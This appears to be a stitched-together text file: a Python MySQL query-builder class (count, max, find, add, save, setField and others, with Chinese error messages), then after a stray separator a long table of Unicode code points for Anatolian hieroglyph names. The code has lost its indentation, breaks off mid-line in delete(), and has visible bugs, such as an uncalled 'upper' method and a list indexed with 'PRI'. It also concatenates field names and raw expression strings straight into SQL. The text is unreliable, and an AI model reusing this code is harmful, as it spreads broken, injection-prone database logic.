        ``obj.fetchSql(...)`` on the same instance would raise TypeError
        unless the attribute is reset elsewhere; confirm intended.
        """
        self.fetchSql = fetchSql
        return self
def count(self, field='*'):
self.fieldString = ' COUNT(' + field + ') AS f_count'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_count']
def max(self, field):
self.fieldString = ' MAX(' + field + ') AS f_max'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_max']
def min(self, field):
self.fieldString = ' MIN(' + field + ') AS f_min'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_min']
def avg(self, field):
self.fieldString = ' AVG(' + field + ') AS f_avg'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_avg']
def sum(self, field):
self.fieldString = ' SUM(' + field + ') AS f_sum'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_sum']
def buildSql(self):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
buildSql = self._replaceSpecialChar('%s', self.whereValueArray, sqlString)
self._clearSubString()
return '( ' + buildSql + ' )'
def find(self, primary_key_value=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if primary_key_value != '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
self.whereStringArray.append('`' + self.columns[0] + '` = %s')
self.whereValueArray.append(primary_key_value)
self.limitString = ' LIMIT 1'
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
res = self.query(sqlString, True)
return res
def select(self, query=True):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
if query == False:
self.fetchSql = True
res = self.query(sqlString)
return res
def add(self, data=''):
field_str = ''
if data != '':
if not isinstance(data, dict):
self.throw_exception('add方法只支持传入字典')
length = len(data)
if length == 0:
placeholder = ''
else:
for key, val in data.items():
field_str += '`' + key + '`,'
self.whereValueArray.append(val)
field_str = field_str.rstrip(',')
placeholder = '%s'
for i in range(1, length):
placeholder += ',%s'
else:
placeholder = ''
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES (' + placeholder + ')'
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
def addAll(self, dataList):
if not isinstance(dataList, (list, tuple)):
self.throw_exception('addAll方法只支持传入list或tuple')
field_str = ''
fieldList = []
number = len(dataList)
valueListStr = ''
if number == 0:
self.throw_exception('addAll方法请勿传入空数组')
if not isinstance(dataList[0], dict):
self.throw_exception('addAll方法传入的参数须为由字典组成的列表或元组')
number_field = len(dataList[0])
if number_field == 0:
valueListStr += '()'
for i in range(1, number):
if not isinstance(dataList[i], dict):
self.throw_exception('addAll方法传入的参数须为由字典组成的列表或元组')
valueListStr += ',()'
else:
valueStr = '('
for key, val in dataList[0].items():
fieldList.append(key)
self.whereValueArray.append(val)
field_str += key + ','
valueStr += '%s,'
field_str = field_str.rstrip(',')
valueStr = valueStr.rstrip(',')
valueStr += ')'
valueListStr += valueStr
for i in range(1, number):
for j in range(number_field):
self.whereValueArray.append(dataList[i][fieldList[j]])
valueListStr += ',' + valueStr
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES ' + valueListStr
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
def setField(self, *field):
param_number = len(field)
if field == 0:
self.throw_exception('setField子句须传入参数')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if isinstance(field[0], dict) and self.columns[0] != '' and self.columns[0] in field[0]:
if isinstance(field[0][self.columns[0]], (list, tuple)):
if field[0][self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns[0] + '` = ' + field[0][self.columns[0]][1].strip()
else:
self.throw_exception('setField子句仅支持exp表达式更新')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(field[0][self.columns[0]])
del field[0][self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('没有任何更新条件,且指定数据表无主键,不被允许执行更新操作')
else:
self.throw_exception('没有任何更新条件,数据对象本身也不包含主键字段,不被允许执行更新操作')
setFieldStr = ''
updateValueArray = []
if isinstance(field[0], str):
if param_number != 2:
self.throw_exception('setField子句接收两个参数(属性名,属性值)')
if field[0].find('.') == -1:
setFieldStr += '`' + field[0].strip() + '` = %s'
else:
setFieldStr += field[0].strip() + ' = %s'
updateValueArray.append(field[1])
elif isinstance(field[0], dict):
if param_number != 1:
self.throw_exception('setField子句只接收一个数组参数')
for key, val in field[0].items():
if isinstance(val, (list, tuple)):
if val[0].upper() == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('setField子句仅支持exp表达式更新')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
else:
self.throw_exception('setField子句传入的参数类型错误:' + field[0])
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def setInc(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' + ' + str(value)]
return self.save(data)
def setDec(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' - ' + str(value)]
return self.save(data)
def save(self, data):
if not isinstance(data, dict):
self.throw_exception('save子句只接收数组参数')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if self.columns[0] != '' and self.columns[0] in data:
if isinstance(data[self.columns[0]], (list, tuple)):
if data[self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns['PRI'] + '` = ' + data[self.columns[0]][1].strip()
else:
self.throw_exception('save子句仅支持exp表达式更新')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(data[self.columns[0]])
del data[self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('没有任何更新条件,且指定数据表无主键,不被允许执行更新操作')
else:
self.throw_exception('没有任何更新条件,数据对象本身也不包含主键字段,不被允许执行更新操作')
setFieldStr = ''
updateValueArray = []
for key, val in data.items():
if isinstance(val, (list, tuple)):
# 支持exp表达式进行数据更新
if val[0].upper == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('save子句仅支持exp表达式更新')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def delete(self, table=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if table != '':
table = ' ' + table
self.parseWhere()
if self.whereString == '':
if self.joinString == '' or self.joinString.upper().find(' ON ') == -1:
self.throw_exception('没有传入任何条件,不被允许执行删除操作')
sqlString = 'DELETE' + table + ' FROM ' + table_name + | |
'ANATOLIAN HIEROGLYPH A143',
83115: 'ANATOLIAN HIEROGLYPH A144',
83116: 'ANATOLIAN HIEROGLYPH A145',
83117: 'ANATOLIAN HIEROGLYPH A146',
83118: 'ANATOLIAN HIEROGLYPH A147',
83119: 'ANATOLIAN HIEROGLYPH A148',
83120: 'ANATOLIAN HIEROGLYPH A149',
83121: 'ANATOLIAN HIEROGLYPH A150',
83122: 'ANATOLIAN HIEROGLYPH A151',
83123: 'ANATOLIAN HIEROGLYPH A152',
83124: 'ANATOLIAN HIEROGLYPH A153',
83125: 'ANATOLIAN HIEROGLYPH A154',
83126: 'ANATOLIAN HIEROGLYPH A155',
83127: 'ANATOLIAN HIEROGLYPH A156',
83128: 'ANATOLIAN HIEROGLYPH A157',
83129: 'ANATOLIAN HIEROGLYPH A158',
83130: 'ANATOLIAN HIEROGLYPH A159',
83131: 'ANATOLIAN HIEROGLYPH A160',
83132: 'ANATOLIAN HIEROGLYPH A161',
83133: 'ANATOLIAN HIEROGLYPH A162',
83134: 'ANATOLIAN HIEROGLYPH A163',
83135: 'ANATOLIAN HIEROGLYPH A164',
83136: 'ANATOLIAN HIEROGLYPH A165',
83137: 'ANATOLIAN HIEROGLYPH A166',
83138: 'ANATOLIAN HIEROGLYPH A167',
83139: 'ANATOLIAN HIEROGLYPH A168',
83140: 'ANATOLIAN HIEROGLYPH A169',
83141: 'ANATOLIAN HIEROGLYPH A170',
83142: 'ANATOLIAN HIEROGLYPH A171',
83143: 'ANATOLIAN HIEROGLYPH A172',
83144: 'ANATOLIAN HIEROGLYPH A173',
83145: 'ANATOLIAN HIEROGLYPH A174',
83146: 'ANATOLIAN HIEROGLYPH A175',
83147: 'ANATOLIAN HIEROGLYPH A176',
83148: 'ANATOLIAN HIEROGLYPH A177',
83149: 'ANATOLIAN HIEROGLYPH A178',
83150: 'ANATOLIAN HIEROGLYPH A179',
83151: 'ANATOLIAN HIEROGLYPH A180',
83152: 'ANATOLIAN HIEROGLYPH A181',
83153: 'ANATOLIAN HIEROGLYPH A182',
83154: 'ANATOLIAN HIEROGLYPH A183',
83155: 'ANATOLIAN HIEROGLYPH A184',
83156: 'ANATOLIAN HIEROGLYPH A185',
83157: 'ANATOLIAN HIEROGLYPH A186',
83158: 'ANATOLIAN HIEROGLYPH A187',
83159: 'ANATOLIAN HIEROGLYPH A188',
83160: 'ANATOLIAN HIEROGLYPH A189',
83161: 'ANATOLIAN HIEROGLYPH A190',
83162: 'ANATOLIAN HIEROGLYPH A191',
83163: 'ANATOLIAN HIEROGLYPH A192',
83164: 'ANATOLIAN HIEROGLYPH A193',
83165: 'ANATOLIAN HIEROGLYPH A194',
83166: 'ANATOLIAN HIEROGLYPH A195',
83167: 'ANATOLIAN HIEROGLYPH A196',
83168: 'ANATOLIAN HIEROGLYPH A197',
83169: 'ANATOLIAN HIEROGLYPH A198',
83170: 'ANATOLIAN HIEROGLYPH A199',
83171: 'ANATOLIAN HIEROGLYPH A200',
83172: 'ANATOLIAN HIEROGLYPH A201',
83173: 'ANATOLIAN HIEROGLYPH A202',
83174: 'ANATOLIAN HIEROGLYPH A202A',
83175: 'ANATOLIAN HIEROGLYPH A202B',
83176: 'ANATOLIAN HIEROGLYPH A203',
83177: 'ANATOLIAN HIEROGLYPH A204',
83178: 'ANATOLIAN HIEROGLYPH A205',
83179: 'ANATOLIAN HIEROGLYPH A206',
83180: 'ANATOLIAN HIEROGLYPH A207',
83181: 'ANATOLIAN HIEROGLYPH A207A',
83182: 'ANATOLIAN HIEROGLYPH A208',
83183: 'ANATOLIAN HIEROGLYPH A209',
83184: 'ANATOLIAN HIEROGLYPH A209A',
83185: 'ANATOLIAN HIEROGLYPH A210',
83186: 'ANATOLIAN HIEROGLYPH A211',
83187: 'ANATOLIAN HIEROGLYPH A212',
83188: 'ANATOLIAN HIEROGLYPH A213',
83189: 'ANATOLIAN HIEROGLYPH A214',
83190: 'ANATOLIAN HIEROGLYPH A215',
83191: 'ANATOLIAN HIEROGLYPH A215A',
83192: 'ANATOLIAN HIEROGLYPH A216',
83193: 'ANATOLIAN HIEROGLYPH A216A',
83194: 'ANATOLIAN HIEROGLYPH A217',
83195: 'ANATOLIAN HIEROGLYPH A218',
83196: 'ANATOLIAN HIEROGLYPH A219',
83197: 'ANATOLIAN HIEROGLYPH A220',
83198: 'ANATOLIAN HIEROGLYPH A221',
83199: 'ANATOLIAN HIEROGLYPH A222',
83200: 'ANATOLIAN HIEROGLYPH A223',
83201: 'ANATOLIAN HIEROGLYPH A224',
83202: 'ANATOLIAN HIEROGLYPH A225',
83203: 'ANATOLIAN HIEROGLYPH A226',
83204: 'ANATOLIAN HIEROGLYPH A227',
83205: 'ANATOLIAN HIEROGLYPH A227A',
83206: 'ANATOLIAN HIEROGLYPH A228',
83207: 'ANATOLIAN HIEROGLYPH A229',
83208: 'ANATOLIAN HIEROGLYPH A230',
83209: 'ANATOLIAN HIEROGLYPH A231',
83210: 'ANATOLIAN HIEROGLYPH A232',
83211: 'ANATOLIAN HIEROGLYPH A233',
83212: 'ANATOLIAN HIEROGLYPH A234',
83213: 'ANATOLIAN HIEROGLYPH A235',
83214: 'ANATOLIAN HIEROGLYPH A236',
83215: 'ANATOLIAN HIEROGLYPH A237',
83216: 'ANATOLIAN HIEROGLYPH A238',
83217: 'ANATOLIAN HIEROGLYPH A239',
83218: 'ANATOLIAN HIEROGLYPH A240',
83219: 'ANATOLIAN HIEROGLYPH A241',
83220: 'ANATOLIAN HIEROGLYPH A242',
83221: 'ANATOLIAN HIEROGLYPH A243',
83222: 'ANATOLIAN HIEROGLYPH A244',
83223: 'ANATOLIAN HIEROGLYPH A245',
83224: 'ANATOLIAN HIEROGLYPH A246',
83225: 'ANATOLIAN HIEROGLYPH A247',
83226: 'ANATOLIAN HIEROGLYPH A248',
83227: 'ANATOLIAN HIEROGLYPH A249',
83228: 'ANATOLIAN HIEROGLYPH A250',
83229: 'ANATOLIAN HIEROGLYPH A251',
83230: 'ANATOLIAN HIEROGLYPH A252',
83231: 'ANATOLIAN HIEROGLYPH A253',
83232: 'ANATOLIAN HIEROGLYPH A254',
83233: 'ANATOLIAN HIEROGLYPH A255',
83234: 'ANATOLIAN HIEROGLYPH A256',
83235: 'ANATOLIAN HIEROGLYPH A257',
83236: 'ANATOLIAN HIEROGLYPH A258',
83237: 'ANATOLIAN HIEROGLYPH A259',
83238: 'ANATOLIAN HIEROGLYPH A260',
83239: 'ANATOLIAN HIEROGLYPH A261',
83240: 'ANATOLIAN HIEROGLYPH A262',
83241: 'ANATOLIAN HIEROGLYPH A263',
83242: 'ANATOLIAN HIEROGLYPH A264',
83243: 'ANATOLIAN HIEROGLYPH A265',
83244: 'ANATOLIAN HIEROGLYPH A266',
83245: 'ANATOLIAN HIEROGLYPH A267',
83246: 'ANATOLIAN HIEROGLYPH A267A',
83247: 'ANATOLIAN HIEROGLYPH A268',
83248: 'ANATOLIAN HIEROGLYPH A269',
83249: 'ANATOLIAN HIEROGLYPH A270',
83250: 'ANATOLIAN HIEROGLYPH A271',
83251: 'ANATOLIAN HIEROGLYPH A272',
83252: 'ANATOLIAN HIEROGLYPH A273',
83253: 'ANATOLIAN HIEROGLYPH A274',
83254: 'ANATOLIAN HIEROGLYPH A275',
83255: 'ANATOLIAN HIEROGLYPH A276',
83256: 'ANATOLIAN HIEROGLYPH A277',
83257: 'ANATOLIAN HIEROGLYPH A278',
83258: 'ANATOLIAN HIEROGLYPH A279',
83259: 'ANATOLIAN HIEROGLYPH A280',
83260: 'ANATOLIAN HIEROGLYPH A281',
83261: 'ANATOLIAN HIEROGLYPH A282',
83262: 'ANATOLIAN HIEROGLYPH A283',
83263: 'ANATOLIAN HIEROGLYPH A284',
83264: 'ANATOLIAN HIEROGLYPH A285',
83265: 'ANATOLIAN HIEROGLYPH A286',
83266: 'ANATOLIAN HIEROGLYPH A287',
83267: 'ANATOLIAN HIEROGLYPH A288',
83268: 'ANATOLIAN HIEROGLYPH A289',
83269: 'ANATOLIAN HIEROGLYPH A289A',
83270: 'ANATOLIAN HIEROGLYPH A290',
83271: 'ANATOLIAN HIEROGLYPH A291',
83272: 'ANATOLIAN HIEROGLYPH A292',
83273: 'ANATOLIAN HIEROGLYPH A293',
83274: 'ANATOLIAN HIEROGLYPH A294',
83275: 'ANATOLIAN HIEROGLYPH A294A',
83276: 'ANATOLIAN HIEROGLYPH A295',
83277: 'ANATOLIAN HIEROGLYPH A296',
83278: 'ANATOLIAN HIEROGLYPH A297',
83279: 'ANATOLIAN HIEROGLYPH A298',
83280: 'ANATOLIAN HIEROGLYPH A299',
83281: 'ANATOLIAN HIEROGLYPH A299A',
83282: 'ANATOLIAN HIEROGLYPH A300',
83283: 'ANATOLIAN HIEROGLYPH A301',
83284: 'ANATOLIAN HIEROGLYPH A302',
83285: 'ANATOLIAN HIEROGLYPH A303',
83286: 'ANATOLIAN HIEROGLYPH A304',
83287: 'ANATOLIAN HIEROGLYPH A305',
83288: 'ANATOLIAN HIEROGLYPH A306',
83289: 'ANATOLIAN HIEROGLYPH A307',
83290: 'ANATOLIAN HIEROGLYPH A308',
83291: 'ANATOLIAN HIEROGLYPH A309',
83292: 'ANATOLIAN HIEROGLYPH A309A',
83293: 'ANATOLIAN HIEROGLYPH A310',
83294: 'ANATOLIAN HIEROGLYPH A311',
83295: 'ANATOLIAN HIEROGLYPH A312',
83296: 'ANATOLIAN HIEROGLYPH A313',
83297: 'ANATOLIAN HIEROGLYPH A314',
83298: 'ANATOLIAN HIEROGLYPH A315',
83299: 'ANATOLIAN HIEROGLYPH A316',
83300: 'ANATOLIAN HIEROGLYPH A317',
83301: 'ANATOLIAN HIEROGLYPH A318',
83302: 'ANATOLIAN HIEROGLYPH A319',
83303: 'ANATOLIAN HIEROGLYPH A320',
83304: 'ANATOLIAN HIEROGLYPH A321',
83305: 'ANATOLIAN HIEROGLYPH A322',
83306: 'ANATOLIAN HIEROGLYPH A323',
83307: 'ANATOLIAN HIEROGLYPH A324',
83308: 'ANATOLIAN HIEROGLYPH A325',
83309: 'ANATOLIAN HIEROGLYPH A326',
83310: 'ANATOLIAN HIEROGLYPH A327',
83311: 'ANATOLIAN HIEROGLYPH A328',
83312: 'ANATOLIAN HIEROGLYPH A329',
83313: 'ANATOLIAN HIEROGLYPH A329A',
83314: 'ANATOLIAN HIEROGLYPH A330',
83315: 'ANATOLIAN HIEROGLYPH A331',
83316: 'ANATOLIAN HIEROGLYPH A332A',
83317: 'ANATOLIAN HIEROGLYPH A332B',
83318: 'ANATOLIAN HIEROGLYPH A332C',
83319: 'ANATOLIAN HIEROGLYPH A333',
83320: 'ANATOLIAN HIEROGLYPH A334',
83321: 'ANATOLIAN HIEROGLYPH A335',
83322: 'ANATOLIAN HIEROGLYPH A336',
83323: 'ANATOLIAN HIEROGLYPH A336A',
83324: 'ANATOLIAN HIEROGLYPH A336B',
83325: 'ANATOLIAN HIEROGLYPH A336C',
83326: 'ANATOLIAN HIEROGLYPH A337',
83327: 'ANATOLIAN HIEROGLYPH A338',
83328: 'ANATOLIAN HIEROGLYPH A339',
83329: 'ANATOLIAN HIEROGLYPH A340',
83330: 'ANATOLIAN HIEROGLYPH A341',
83331: 'ANATOLIAN HIEROGLYPH A342',
83332: 'ANATOLIAN HIEROGLYPH A343',
83333: 'ANATOLIAN HIEROGLYPH A344',
83334: 'ANATOLIAN HIEROGLYPH A345',
83335: 'ANATOLIAN HIEROGLYPH A346',
83336: 'ANATOLIAN HIEROGLYPH A347',
83337: 'ANATOLIAN HIEROGLYPH A348',
83338: 'ANATOLIAN HIEROGLYPH A349',
83339: 'ANATOLIAN HIEROGLYPH A350',
83340: 'ANATOLIAN HIEROGLYPH A351',
83341: 'ANATOLIAN HIEROGLYPH A352',
83342: 'ANATOLIAN HIEROGLYPH A353',
83343: 'ANATOLIAN HIEROGLYPH A354',
83344: 'ANATOLIAN HIEROGLYPH A355',
83345: 'ANATOLIAN HIEROGLYPH A356',
83346: 'ANATOLIAN HIEROGLYPH A357',
83347: 'ANATOLIAN HIEROGLYPH A358',
83348: 'ANATOLIAN HIEROGLYPH A359',
83349: 'ANATOLIAN HIEROGLYPH A359A',
83350: 'ANATOLIAN HIEROGLYPH A360',
83351: 'ANATOLIAN HIEROGLYPH A361',
83352: 'ANATOLIAN HIEROGLYPH A362',
83353: 'ANATOLIAN HIEROGLYPH A363',
83354: 'ANATOLIAN HIEROGLYPH A364',
83355: 'ANATOLIAN HIEROGLYPH A364A',
83356: 'ANATOLIAN HIEROGLYPH A365',
83357: 'ANATOLIAN HIEROGLYPH A366',
83358: 'ANATOLIAN HIEROGLYPH A367',
83359: 'ANATOLIAN HIEROGLYPH A368',
83360: 'ANATOLIAN HIEROGLYPH A368A',
83361: 'ANATOLIAN HIEROGLYPH A369',
83362: 'ANATOLIAN HIEROGLYPH A370',
83363: 'ANATOLIAN HIEROGLYPH A371',
83364: 'ANATOLIAN HIEROGLYPH A371A',
83365: 'ANATOLIAN HIEROGLYPH A372',
83366: 'ANATOLIAN HIEROGLYPH A373',
83367: 'ANATOLIAN HIEROGLYPH A374',
83368: 'ANATOLIAN HIEROGLYPH A375',
83369: 'ANATOLIAN HIEROGLYPH A376',
83370: 'ANATOLIAN HIEROGLYPH A377',
83371: 'ANATOLIAN HIEROGLYPH A378',
83372: 'ANATOLIAN HIEROGLYPH A379',
83373: 'ANATOLIAN HIEROGLYPH A380',
83374: 'ANATOLIAN HIEROGLYPH A381',
83375: 'ANATOLIAN HIEROGLYPH A381A',
83376: 'ANATOLIAN HIEROGLYPH A382',
83377: 'ANATOLIAN HIEROGLYPH A383 RA OR RI',
83378: 'ANATOLIAN HIEROGLYPH A383A',
83379: 'ANATOLIAN HIEROGLYPH A384',
83380: 'ANATOLIAN HIEROGLYPH A385',
83381: 'ANATOLIAN HIEROGLYPH A386',
83382: 'ANATOLIAN HIEROGLYPH A386A',
83383: 'ANATOLIAN HIEROGLYPH A387',
83384: 'ANATOLIAN HIEROGLYPH A388',
83385: 'ANATOLIAN HIEROGLYPH A389',
83386: 'ANATOLIAN HIEROGLYPH A390',
83387: 'ANATOLIAN HIEROGLYPH A391',
83388: 'ANATOLIAN HIEROGLYPH A392',
83389: 'ANATOLIAN HIEROGLYPH A393 EIGHT',
83390: 'ANATOLIAN HIEROGLYPH A394',
83391: 'ANATOLIAN HIEROGLYPH A395',
83392: 'ANATOLIAN HIEROGLYPH A396',
83393: 'ANATOLIAN HIEROGLYPH A397',
83394: 'ANATOLIAN HIEROGLYPH A398',
83395: 'ANATOLIAN HIEROGLYPH A399',
83396: 'ANATOLIAN HIEROGLYPH A400',
83397: 'ANATOLIAN HIEROGLYPH A401',
83398: 'ANATOLIAN HIEROGLYPH A402',
83399: 'ANATOLIAN HIEROGLYPH A403',
83400: 'ANATOLIAN HIEROGLYPH A404',
83401: 'ANATOLIAN HIEROGLYPH A405',
83402: 'ANATOLIAN HIEROGLYPH A406',
83403: 'ANATOLIAN HIEROGLYPH A407',
83404: 'ANATOLIAN HIEROGLYPH A408',
83405: 'ANATOLIAN HIEROGLYPH A409',
83406: 'ANATOLIAN HIEROGLYPH A410 BEGIN LOGOGRAM MARK',
83407: 'ANATOLIAN HIEROGLYPH A410A END LOGOGRAM MARK',
83408: 'ANATOLIAN HIEROGLYPH A411',
83409: 'ANATOLIAN HIEROGLYPH A412',
83410: 'ANATOLIAN HIEROGLYPH A413',
83411: 'ANATOLIAN HIEROGLYPH A414',
83412: 'ANATOLIAN HIEROGLYPH A415',
83413: 'ANATOLIAN HIEROGLYPH A416',
83414: 'ANATOLIAN HIEROGLYPH A417',
83415: 'ANATOLIAN HIEROGLYPH A418',
83416: 'ANATOLIAN HIEROGLYPH A419',
83417: 'ANATOLIAN HIEROGLYPH A420',
83418: 'ANATOLIAN HIEROGLYPH A421',
83419: 'ANATOLIAN HIEROGLYPH A422',
83420: 'ANATOLIAN HIEROGLYPH A423',
83421: 'ANATOLIAN HIEROGLYPH A424',
83422: 'ANATOLIAN HIEROGLYPH A425',
83423: 'ANATOLIAN HIEROGLYPH A426',
83424: 'ANATOLIAN HIEROGLYPH A427',
83425: 'ANATOLIAN HIEROGLYPH A428',
83426: 'ANATOLIAN HIEROGLYPH A429',
83427: 'ANATOLIAN HIEROGLYPH A430',
83428: 'ANATOLIAN HIEROGLYPH A431',
83429: 'ANATOLIAN HIEROGLYPH A432',
83430: 'ANATOLIAN HIEROGLYPH A433',
83431: 'ANATOLIAN HIEROGLYPH A434',
83432: 'ANATOLIAN HIEROGLYPH A435',
83433: 'ANATOLIAN HIEROGLYPH A436',
83434: 'ANATOLIAN HIEROGLYPH A437',
83435: 'ANATOLIAN HIEROGLYPH A438',
83436: 'ANATOLIAN HIEROGLYPH A439',
83437: 'ANATOLIAN HIEROGLYPH A440',
83438: 'ANATOLIAN HIEROGLYPH A441',
83439: 'ANATOLIAN HIEROGLYPH A442',
83440: 'ANATOLIAN HIEROGLYPH A443',
83441: 'ANATOLIAN HIEROGLYPH A444',
83442: 'ANATOLIAN HIEROGLYPH A445',
83443: 'ANATOLIAN HIEROGLYPH A446',
83444: 'ANATOLIAN HIEROGLYPH A447',
83445: 'ANATOLIAN HIEROGLYPH A448',
83446: 'ANATOLIAN HIEROGLYPH A449',
83447: 'ANATOLIAN HIEROGLYPH A450',
83448: 'ANATOLIAN HIEROGLYPH A450A',
83449: 'ANATOLIAN HIEROGLYPH A451',
83450: 'ANATOLIAN HIEROGLYPH A452',
83451: 'ANATOLIAN HIEROGLYPH A453',
83452: 'ANATOLIAN HIEROGLYPH A454',
83453: 'ANATOLIAN HIEROGLYPH A455',
83454: 'ANATOLIAN HIEROGLYPH A456',
83455: 'ANATOLIAN HIEROGLYPH A457',
83456: 'ANATOLIAN HIEROGLYPH A457A',
83457: 'ANATOLIAN HIEROGLYPH A458',
83458: 'ANATOLIAN HIEROGLYPH A459',
83459: 'ANATOLIAN HIEROGLYPH A460',
83460: 'ANATOLIAN HIEROGLYPH A461',
83461: 'ANATOLIAN HIEROGLYPH A462',
83462: 'ANATOLIAN HIEROGLYPH A463',
83463: 'ANATOLIAN HIEROGLYPH A464',
83464: 'ANATOLIAN HIEROGLYPH A465',
83465: 'ANATOLIAN HIEROGLYPH A466',
83466: 'ANATOLIAN HIEROGLYPH A467',
83467: 'ANATOLIAN HIEROGLYPH A468',
83468: 'ANATOLIAN HIEROGLYPH A469',
83469: 'ANATOLIAN HIEROGLYPH A470',
83470: 'ANATOLIAN HIEROGLYPH A471',
83471: 'ANATOLIAN HIEROGLYPH A472',
83472: 'ANATOLIAN HIEROGLYPH A473',
83473: 'ANATOLIAN HIEROGLYPH A474',
83474: 'ANATOLIAN HIEROGLYPH A475',
83475: 'ANATOLIAN HIEROGLYPH A476',
83476: 'ANATOLIAN HIEROGLYPH A477',
83477: 'ANATOLIAN HIEROGLYPH A478',
83478: 'ANATOLIAN HIEROGLYPH A479',
83479: 'ANATOLIAN HIEROGLYPH A480',
83480: 'ANATOLIAN HIEROGLYPH A481',
83481: 'ANATOLIAN HIEROGLYPH A482',
83482: 'ANATOLIAN HIEROGLYPH A483',
83483: 'ANATOLIAN HIEROGLYPH A484',
83484: 'ANATOLIAN HIEROGLYPH A485',
83485: 'ANATOLIAN HIEROGLYPH A486',
83486: 'ANATOLIAN HIEROGLYPH A487',
83487: 'ANATOLIAN HIEROGLYPH A488',
83488: 'ANATOLIAN HIEROGLYPH A489',
83489: 'ANATOLIAN HIEROGLYPH A490',
83490: 'ANATOLIAN HIEROGLYPH A491',
83491: 'ANATOLIAN HIEROGLYPH A492',
83492: 'ANATOLIAN HIEROGLYPH A493',
83493: 'ANATOLIAN HIEROGLYPH A494',
83494: 'ANATOLIAN HIEROGLYPH A495',
83495: 'ANATOLIAN HIEROGLYPH A496',
83496: 'ANATOLIAN HIEROGLYPH A497',
83497: 'ANATOLIAN HIEROGLYPH A501',
83498: 'ANATOLIAN HIEROGLYPH A502',
83499: 'ANATOLIAN HIEROGLYPH A503',
83500: 'ANATOLIAN HIEROGLYPH A504',
83501: 'ANATOLIAN HIEROGLYPH A505',
83502: 'ANATOLIAN HIEROGLYPH A506',
83503: 'ANATOLIAN HIEROGLYPH A507',
83504: 'ANATOLIAN HIEROGLYPH A508',
83505: 'ANATOLIAN HIEROGLYPH A509',
83506: 'ANATOLIAN HIEROGLYPH A510',
83507: 'ANATOLIAN HIEROGLYPH A511',
83508: 'ANATOLIAN HIEROGLYPH A512',
83509: 'ANATOLIAN HIEROGLYPH A513',
83510: 'ANATOLIAN HIEROGLYPH A514',
